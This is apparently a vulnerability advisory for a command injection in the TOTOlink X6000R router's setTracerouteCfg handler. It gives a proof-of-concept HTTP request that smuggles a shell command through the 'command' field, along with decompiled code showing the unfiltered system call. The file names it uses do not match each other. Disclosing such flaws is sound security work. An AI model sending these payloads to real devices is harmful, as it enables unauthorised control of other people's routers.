Headline
CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)
An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.
TOTOlink X6000R V9.4.0cu.852_B20230719 command injection****Produce information
Device:TOTOlink X6000R
Firmware version:V9.4.0cu.852_B20230719
Manufacturer’s website information:https://www.totolink.net/
The firmware download address:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html
Vulnerability description
Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi
poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}
Inject the command “ls>/web/tes2t.txt”
Injection result:
1
2
3
4
5
6
7
8
9
10
GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
Analyse
The function in the shttp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
__int64 __fastcall sub_415950(__int64 a1, __int64 a2){ const char *v4; // x22 const char *v5; // x0 unsigned int v6; // w0 char s[256]; // [xsp+38h] [xbp+38h] BYREF memset(s, 0, sizeof(s)); v4 = (const char *)sub_40BD6C(a1, "command"); v5 = (const char *)sub_40BD6C(a1, "num"); v6 = atoi(v5); if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 ) __break(0x3E8u); CsteSystem(s, 0LL); sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv"); return 0LL;}
There is a command splicing that bypasses execution without any filtering!